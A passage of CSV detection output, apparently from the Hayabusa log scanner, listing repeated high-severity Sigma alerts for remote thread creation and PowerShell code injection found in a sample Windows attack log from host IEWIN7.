Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 